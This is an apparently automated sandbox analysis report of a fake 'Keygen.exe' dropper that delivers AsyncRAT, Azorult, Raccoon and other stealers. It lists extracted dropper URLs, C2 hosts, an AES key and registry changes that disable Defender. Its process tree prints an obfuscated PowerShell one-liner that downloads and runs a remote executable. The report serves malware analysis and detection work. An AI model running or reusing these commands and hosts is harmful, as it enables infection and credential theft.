asyncrat | 390d7472201e8ea9bdc6c7fa2b4ab1f6faca02071f1f997037cc5f52759a9cb6

Resubmissions

12-11-2021 18:04

211112-wnzb8aahhm 10

19-11-2020 10:08

201119-rhwlt38jrx 10

18-11-2020 17:26

201118-htd4fq29va 10

Analysis

max time kernel
83s
max time network
1816s
platform
windows10_x64
resource
win10v20201028
submitted
18-11-2020 17:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Keygen.exe

Score

10^/10

asyncrat azorult modiloader oski raccoon 5e4db353b88c002ba6466c06437973619aad03b3 discovery evasion infostealer rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Family

raccoon

Botnet

5e4db353b88c002ba6466c06437973619aad03b3

Attributes

url4cnc
https://telete.in/brikitiki

rc4.plain

Extracted

Family

oski

taenaiaa.ac.ug

Extracted

Family

azorult

http://195.245.112.115/index.php

Extracted

Family

asyncrat

Version

0.5.7B

agentttt.ac.ug:6970

agentpurple.ac.ug:6970

Mutex

AsyncMutex_6SI8OkPnk

Attributes

aes_key
16dw6EDbQkYZp5BTs7cmLUicVtOA4UQr
anti_detection
false
autorun
false
bdos
false
delay
Default
host
agentttt.ac.ug,agentpurple.ac.ug
hwid
3
install_file
install_folder
%AppData%
mutex
AsyncMutex_6SI8OkPnk
pastebin_config
null
port
6970
version
0.5.7B

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult

Contains code to disable Windows Defender 10 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral12/memory/2232-236-0x0000000000400000-0x000000000040C000-memory.dmp	disable_win_def
behavioral12/memory/2232-237-0x000000000040616E-mapping.dmp	disable_win_def
behavioral12/memory/3548-255-0x0000000000400000-0x0000000000408000-memory.dmp	disable_win_def
behavioral12/memory/3548-257-0x0000000000403BEE-mapping.dmp	disable_win_def
behavioral12/files/0x000300000001abb1-288.dat	disable_win_def
behavioral12/files/0x000300000001abb1-287.dat	disable_win_def
behavioral12/memory/1840-633-0x000000000040616E-mapping.dmp	disable_win_def
behavioral12/memory/5988-647-0x0000000000403BEE-mapping.dmp	disable_win_def
behavioral12/files/0x000400000001abcd-681.dat	disable_win_def
behavioral12/files/0x000400000001abcd-680.dat	disable_win_def

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Oski
Oski is an infostealer targeting browser data, crypto wallets.
infostealer oski
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon

Async RAT payload 3 IoCs

rat

resource	yara_rule
behavioral12/memory/1556-227-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral12/memory/1556-228-0x000000000040C76E-mapping.dmp	asyncrat
behavioral12/memory/3632-624-0x000000000040C76E-mapping.dmp	asyncrat

ModiLoader First Stage 2 IoCs

resource	yara_rule
behavioral12/memory/4912-301-0x00000000041E0000-0x000000000423C000-memory.dmp	modiloader_stage1
behavioral12/memory/4788-629-0x0000000004170000-0x00000000041CC000-memory.dmp	modiloader_stage1

Blocklisted process makes network request 6 IoCs

flow	pid	Process
9	2132	powershell.exe
11	2176	powershell.exe
14	2132	powershell.exe
15	2176	powershell.exe
17	4520	powershell.exe
19	4520	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 22 IoCs

pid	Process
3808	Keygen.exe
5112	sdj.exe
4200	qar.exe
4464	FGbfttrev.exe
4744	FDvbcgfert.exe
4012	sdj.exe
612	FDvbcgfert.exe
400	FGbfttrev.exe
4584	upd.exe
2200	FGbfttrev.exe
4100	FGbfttrev.exe
4784	7vsmZmYwae.exe
4912	f7uVYRTqmD.exe
4596	ywqRvdP228.exe
4420	TyaY0x0sZ4.exe
1556	7vsmZmYwae.exe
2232	ywqRvdP228.exe
4940	TyaY0x0sZ4.exe
3548	TyaY0x0sZ4.exe
4904	azchgftrq.exe
4964	qar.exe
4628	5dyaglhr.exe

Loads dropped DLL 9 IoCs

pid	Process
612	FDvbcgfert.exe
612	FDvbcgfert.exe
612	FDvbcgfert.exe
4012	sdj.exe
4012	sdj.exe
4012	sdj.exe
4012	sdj.exe
4012	sdj.exe
4012	sdj.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	TyaY0x0sZ4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	TyaY0x0sZ4.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\LocalLow\n9h9r91h8fna789q\desktop.ini	sdj.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs

pid	Process
4012	sdj.exe
4012	sdj.exe
612	FDvbcgfert.exe
612	FDvbcgfert.exe
400	FGbfttrev.exe
400	FGbfttrev.exe
4100	FGbfttrev.exe
4100	FGbfttrev.exe

Suspicious use of SetThreadContext 8 IoCs

description	pid	Process	procid_target
PID 5112 set thread context of 4012	5112	sdj.exe	103
PID 4744 set thread context of 612	4744	FDvbcgfert.exe	104
PID 4464 set thread context of 400	4464	FGbfttrev.exe	105
PID 2200 set thread context of 4100	2200	FGbfttrev.exe	109
PID 4784 set thread context of 1556	4784	7vsmZmYwae.exe	123
PID 4596 set thread context of 2232	4596	ywqRvdP228.exe	124
PID 4420 set thread context of 3548	4420	TyaY0x0sZ4.exe	128
PID 4200 set thread context of 4964	4200	qar.exe	134

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 1 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	FDvbcgfert.exe

Delays execution with timeout.exe 3 IoCs

evasion

pid	Process
4352	timeout.exe
2916	timeout.exe
1512	timeout.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
3900	taskkill.exe
3916	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings	cmd.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	f7uVYRTqmD.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	f7uVYRTqmD.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2132	powershell.exe
416	powershell.exe
2132	powershell.exe
2176	powershell.exe
416	powershell.exe
416	powershell.exe
2176	powershell.exe
2176	powershell.exe
2132	powershell.exe
2132	powershell.exe
4224	powershell.exe
4224	powershell.exe
416	powershell.exe
2176	powershell.exe
4224	powershell.exe
4520	powershell.exe
4520	powershell.exe
4712	powershell.exe
4712	powershell.exe
4224	powershell.exe
4520	powershell.exe
4712	powershell.exe
4520	powershell.exe
4712	powershell.exe
2232	ywqRvdP228.exe
2232	ywqRvdP228.exe
2232	ywqRvdP228.exe
2232	ywqRvdP228.exe
2232	ywqRvdP228.exe
2232	ywqRvdP228.exe
2232	ywqRvdP228.exe
2232	ywqRvdP228.exe
2232	ywqRvdP228.exe
2232	ywqRvdP228.exe
2232	ywqRvdP228.exe
2232	ywqRvdP228.exe
2232	ywqRvdP228.exe
2232	ywqRvdP228.exe
2232	ywqRvdP228.exe
2232	ywqRvdP228.exe
2232	ywqRvdP228.exe
2232	ywqRvdP228.exe
2232	ywqRvdP228.exe
2232	ywqRvdP228.exe
2232	ywqRvdP228.exe
2232	ywqRvdP228.exe
2232	ywqRvdP228.exe
2232	ywqRvdP228.exe
2232	ywqRvdP228.exe
2232	ywqRvdP228.exe
2232	ywqRvdP228.exe
2232	ywqRvdP228.exe
2232	ywqRvdP228.exe
2232	ywqRvdP228.exe
2232	ywqRvdP228.exe
2232	ywqRvdP228.exe
2232	ywqRvdP228.exe
2232	ywqRvdP228.exe
2232	ywqRvdP228.exe
2232	ywqRvdP228.exe
2232	ywqRvdP228.exe
2232	ywqRvdP228.exe
2232	ywqRvdP228.exe
2232	ywqRvdP228.exe

Suspicious behavior: MapViewOfSection 4 IoCs

pid	Process
5112	sdj.exe
4744	FDvbcgfert.exe
4464	FGbfttrev.exe
2200	FGbfttrev.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2132	powershell.exe
Token: SeDebugPrivilege	416	powershell.exe
Token: SeDebugPrivilege	2176	powershell.exe
Token: SeDebugPrivilege	4224	powershell.exe
Token: SeDebugPrivilege	4520	powershell.exe
Token: SeDebugPrivilege	4712	powershell.exe
Token: SeDebugPrivilege	3900	taskkill.exe
Token: SeDebugPrivilege	4784	7vsmZmYwae.exe
Token: SeDebugPrivilege	4596	ywqRvdP228.exe
Token: SeDebugPrivilege	2232	ywqRvdP228.exe
Token: SeDebugPrivilege	4420	TyaY0x0sZ4.exe
Token: SeDebugPrivilege	4200	qar.exe
Token: SeDebugPrivilege	4772	powershell.exe
Token: SeDebugPrivilege	3916	taskkill.exe
Token: SeDebugPrivilege	3236	powershell.exe
Token: SeIncreaseQuotaPrivilege	3236	powershell.exe
Token: SeSecurityPrivilege	3236	powershell.exe
Token: SeTakeOwnershipPrivilege	3236	powershell.exe
Token: SeLoadDriverPrivilege	3236	powershell.exe
Token: SeSystemProfilePrivilege	3236	powershell.exe
Token: SeSystemtimePrivilege	3236	powershell.exe
Token: SeProfSingleProcessPrivilege	3236	powershell.exe
Token: SeIncBasePriorityPrivilege	3236	powershell.exe
Token: SeCreatePagefilePrivilege	3236	powershell.exe
Token: SeBackupPrivilege	3236	powershell.exe
Token: SeRestorePrivilege	3236	powershell.exe
Token: SeShutdownPrivilege	3236	powershell.exe
Token: SeDebugPrivilege	3236	powershell.exe
Token: SeSystemEnvironmentPrivilege	3236	powershell.exe
Token: SeRemoteShutdownPrivilege	3236	powershell.exe
Token: SeUndockPrivilege	3236	powershell.exe
Token: SeManageVolumePrivilege	3236	powershell.exe
Token: 33	3236	powershell.exe
Token: 34	3236	powershell.exe
Token: 35	3236	powershell.exe
Token: 36	3236	powershell.exe
Token: SeDebugPrivilege	4468	powershell.exe
Token: SeDebugPrivilege	548	powershell.exe
Token: SeDebugPrivilege	2000	powershell.exe
Token: SeDebugPrivilege	4156	powershell.exe
Token: SeDebugPrivilege	4580	powershell.exe
Token: SeDebugPrivilege	4428	powershell.exe
Token: SeDebugPrivilege	1020	powershell.exe
Token: SeDebugPrivilege	1412	powershell.exe
Token: SeDebugPrivilege	4668	powershell.exe
Token: SeDebugPrivilege	824	powershell.exe
Token: SeDebugPrivilege	3456	powershell.exe
Token: SeDebugPrivilege	4812	powershell.exe
Token: SeIncreaseQuotaPrivilege	4468	powershell.exe
Token: SeSecurityPrivilege	4468	powershell.exe
Token: SeTakeOwnershipPrivilege	4468	powershell.exe
Token: SeLoadDriverPrivilege	4468	powershell.exe
Token: SeSystemProfilePrivilege	4468	powershell.exe
Token: SeSystemtimePrivilege	4468	powershell.exe
Token: SeProfSingleProcessPrivilege	4468	powershell.exe
Token: SeIncBasePriorityPrivilege	4468	powershell.exe
Token: SeCreatePagefilePrivilege	4468	powershell.exe
Token: SeBackupPrivilege	4468	powershell.exe
Token: SeRestorePrivilege	4468	powershell.exe
Token: SeShutdownPrivilege	4468	powershell.exe
Token: SeDebugPrivilege	4468	powershell.exe
Token: SeSystemEnvironmentPrivilege	4468	powershell.exe
Token: SeRemoteShutdownPrivilege	4468	powershell.exe
Token: SeUndockPrivilege	4468	powershell.exe

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
3808	Keygen.exe
5112	sdj.exe
4464	FGbfttrev.exe
4744	FDvbcgfert.exe
4584	upd.exe
2200	FGbfttrev.exe
2232	ywqRvdP228.exe
2232	ywqRvdP228.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 8 wrote to memory of 3784	8	Keygen.exe	73
PID 8 wrote to memory of 3784	8	Keygen.exe	73
PID 8 wrote to memory of 3784	8	Keygen.exe	73
PID 3784 wrote to memory of 3808	3784	cmd.exe	77
PID 3784 wrote to memory of 3808	3784	cmd.exe	77
PID 3784 wrote to memory of 3808	3784	cmd.exe	77
PID 3784 wrote to memory of 204	3784	cmd.exe	79
PID 3784 wrote to memory of 204	3784	cmd.exe	79
PID 3784 wrote to memory of 204	3784	cmd.exe	79
PID 3784 wrote to memory of 1996	3784	cmd.exe	80
PID 3784 wrote to memory of 1996	3784	cmd.exe	80
PID 3784 wrote to memory of 1996	3784	cmd.exe	80
PID 3784 wrote to memory of 2916	3784	cmd.exe	81
PID 3784 wrote to memory of 2916	3784	cmd.exe	81
PID 3784 wrote to memory of 2916	3784	cmd.exe	81
PID 1996 wrote to memory of 416	1996	mshta.exe	82
PID 1996 wrote to memory of 416	1996	mshta.exe	82
PID 1996 wrote to memory of 416	1996	mshta.exe	82
PID 204 wrote to memory of 2132	204	mshta.exe	84
PID 204 wrote to memory of 2132	204	mshta.exe	84
PID 204 wrote to memory of 2132	204	mshta.exe	84
PID 3784 wrote to memory of 4036	3784	cmd.exe	86
PID 3784 wrote to memory of 4036	3784	cmd.exe	86
PID 3784 wrote to memory of 4036	3784	cmd.exe	86
PID 3784 wrote to memory of 184	3784	cmd.exe	87
PID 3784 wrote to memory of 184	3784	cmd.exe	87
PID 3784 wrote to memory of 184	3784	cmd.exe	87
PID 3784 wrote to memory of 1512	3784	cmd.exe	88
PID 3784 wrote to memory of 1512	3784	cmd.exe	88
PID 3784 wrote to memory of 1512	3784	cmd.exe	88
PID 4036 wrote to memory of 2176	4036	mshta.exe	89
PID 4036 wrote to memory of 2176	4036	mshta.exe	89
PID 4036 wrote to memory of 2176	4036	mshta.exe	89
PID 184 wrote to memory of 4224	184	mshta.exe	91
PID 184 wrote to memory of 4224	184	mshta.exe	91
PID 184 wrote to memory of 4224	184	mshta.exe	91
PID 3784 wrote to memory of 4404	3784	cmd.exe	93
PID 3784 wrote to memory of 4404	3784	cmd.exe	93
PID 3784 wrote to memory of 4404	3784	cmd.exe	93
PID 4404 wrote to memory of 4520	4404	mshta.exe	94
PID 4404 wrote to memory of 4520	4404	mshta.exe	94
PID 4404 wrote to memory of 4520	4404	mshta.exe	94
PID 3784 wrote to memory of 4616	3784	cmd.exe	96
PID 3784 wrote to memory of 4616	3784	cmd.exe	96
PID 3784 wrote to memory of 4616	3784	cmd.exe	96
PID 4616 wrote to memory of 4712	4616	mshta.exe	97
PID 4616 wrote to memory of 4712	4616	mshta.exe	97
PID 4616 wrote to memory of 4712	4616	mshta.exe	97
PID 2132 wrote to memory of 5112	2132	powershell.exe	99
PID 2132 wrote to memory of 5112	2132	powershell.exe	99
PID 2132 wrote to memory of 5112	2132	powershell.exe	99
PID 2176 wrote to memory of 4200	2176	powershell.exe	100
PID 2176 wrote to memory of 4200	2176	powershell.exe	100
PID 2176 wrote to memory of 4200	2176	powershell.exe	100
PID 5112 wrote to memory of 4464	5112	sdj.exe	101
PID 5112 wrote to memory of 4464	5112	sdj.exe	101
PID 5112 wrote to memory of 4464	5112	sdj.exe	101
PID 5112 wrote to memory of 4744	5112	sdj.exe	102
PID 5112 wrote to memory of 4744	5112	sdj.exe	102
PID 5112 wrote to memory of 4744	5112	sdj.exe	102
PID 5112 wrote to memory of 4012	5112	sdj.exe	103
PID 5112 wrote to memory of 4012	5112	sdj.exe	103
PID 5112 wrote to memory of 4012	5112	sdj.exe	103
PID 5112 wrote to memory of 4012	5112	sdj.exe	103

C:\Users\Admin\AppData\Local\Temp\Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Keygen.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:8
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AA01.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\Keygen.exe"
  2⤵
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:3784
- - C:\Users\Admin\AppData\Local\Temp\AA01.tmp\Keygen.exe
    Keygen.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:3808
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\AA01.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:204
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2132
    - - C:\Users\Public\sdj.exe
        
        "C:\Users\Public\sdj.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:5112
      - C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetWindowsHookEx
        
        PID:4464
        
        C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:400
      - C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetWindowsHookEx
        
        PID:4744
        
        C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Checks processor information in registry
        
        PID:612
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /pid 612 & erase C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe & RD /S /Q C:\\ProgramData\\612802928901150\\* & exit
        8⤵
        
        PID:4280
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /pid 612
        9⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3900
      - C:\Users\Public\sdj.exe
        
        "C:\Users\Public\sdj.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops desktop.ini file(s)
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:4012
        
        C:\Users\Admin\AppData\Local\Temp\7vsmZmYwae.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7vsmZmYwae.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:4784
        
        C:\Users\Admin\AppData\Local\Temp\7vsmZmYwae.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7vsmZmYwae.exe"
        8⤵
        Executes dropped EXE
        
        PID:1556
        
        C:\Users\Admin\AppData\Local\Temp\f7uVYRTqmD.exe
        
        "C:\Users\Admin\AppData\Local\Temp\f7uVYRTqmD.exe"
        7⤵
        Executes dropped EXE
        Modifies system certificate store
        
        PID:4912
        
        C:\Windows\SysWOW64\svchost.exe
        
        "C:\Windows\System32\svchost.exe"
        8⤵
        
        PID:5408
        
        C:\Users\Admin\AppData\Local\Temp\ywqRvdP228.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ywqRvdP228.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:4596
        
        C:\Users\Admin\AppData\Local\Temp\ywqRvdP228.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ywqRvdP228.exe"
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:2232
        
        \??\c:\windows\SysWOW64\cmstp.exe
        
        "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\ov0hr2ow.inf
        9⤵
        
        PID:4348
        
        C:\Users\Admin\AppData\Local\Temp\TyaY0x0sZ4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\TyaY0x0sZ4.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:4420
        
        C:\Users\Admin\AppData\Local\Temp\TyaY0x0sZ4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\TyaY0x0sZ4.exe"
        8⤵
        Executes dropped EXE
        
        PID:4940
        
        C:\Users\Admin\AppData\Local\Temp\TyaY0x0sZ4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\TyaY0x0sZ4.exe"
        8⤵
        Executes dropped EXE
        Windows security modification
        
        PID:3548
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" Get-MpPreference -verbose
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4772
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\sdj.exe"
        7⤵
        
        PID:4804
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /T 10 /NOBREAK
        8⤵
        Delays execution with timeout.exe
        
        PID:4352
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\AA01.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1996
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
